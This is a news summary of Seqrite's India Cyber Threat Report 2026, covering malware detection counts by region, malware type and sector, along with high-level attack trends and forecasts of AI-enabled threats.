Seqrite, the enterprise cybersecurity division of Quick Heal Technologies Limited, has unveiled the India Cyber Threat Report 2026—a definitive analysis of 265.52 million malware detections across 8+ million endpoints from October 2024 to September 2025, equating to 505 detections every minute processed by India’s premier malware analysis laboratory.
Maharashtra dominates with 36.13 million incidents (24.31% national total), followed by Gujarat (24.13 million) and Delhi NCR (15.41 million); at city level, Mumbai (16.59 million), New Delhi (15.32 million), and Kolkata (11.87 million) emerge as prime targets—correlating directly with concentrations of financial services, political infrastructure, and industrial operations that amplify attack value.
State and City Threat Distribution
| Rank | State/City | Detections (Millions) | National Share |
| 1 | Maharashtra | 36.13 | 24.31% |
| 2 | Gujarat | 24.13 | 16.24% |
| 3 | Delhi NCR | 15.41 | 10.37% |
| 4 | Mumbai | 16.59 | 11.17% |
| 5 | New Delhi | 15.32 | 10.31% |
| 6 | Kolkata | 11.87 | 7.99% |
Urban threat density reflects digital economy hubs where SMBs, enterprises expose unpatched endpoints via cracked software (Adobe, VLC) and social engineering vectors (malicious attachments, drive-by downloads).
Malware Taxonomy: Trojans and Infectors Reign Supreme
Trojans (43%) and file infectors (35%) constitute 78% of detections, underscoring adversaries’ mastery of persistence mechanisms:
- Banker trojans target UPI/Netbanking (RAT capabilities)
- Info-stealers harvest credentials, crypto wallets
- File infectors exploit macro-enabled Office docs, legacy AV gaps
Sector vulnerability index:
| Sector | Detection Share | Key Vectors |
| Education | 20% | Student portals, LMS exploits |
| Healthcare | 15% | Telemedicine, EHR ransomware |
| Manufacturing | 12% | OT/SCADA legacy, supply chain |
9.2 million vulnerability scans focused WordPress (4.2M), Apache Tomcat (2.1M), SysAid (1.8M)—highlighting web-facing asset neglect.
Threat Evolution: From Episodic to Automation-Driven
Seqrite documents paradigm shift: adversaries deploy continuous scanning via botnets (Mirai variants), RaaS marketplaces (LockBit 3.0 successors), and AI-assisted phishing generating hyper-personalized lures. Fileless malware evades signature-based defenses, while living-off-the-land techniques leverage PowerShell, WMI for stealthy C2.
2025 attack lifecycle:
- Recon (Shodan scans)
- Delivery (spear-phishing, watering holes)
- Exploitation (zero-days, N-day chains)
- Persistence (registry runkeys, scheduled tasks)
- Exfiltration (DNS tunneling, MEGA exfil)
Monetization maturity: Credential stuffing → ransomware → data auctions.
2026 Cognitive Threat Horizon
Looking toward 2026, Seqrite forecasts the rise of cognitive intrusions powered by artificial intelligence, where adversaries leverage large language models to chain vulnerabilities automatically, generate convincing deepfake deception campaigns, and maintain persistence through autonomous agent swarms. India’s unique risk profile amplifies these threats, with over 1 billion monthly UPI transactions, persistent Aadhaar database exposures, and the rapid digital banking adoption across Tier-2 and Tier-3 cities creating unprecedented attack surfaces.
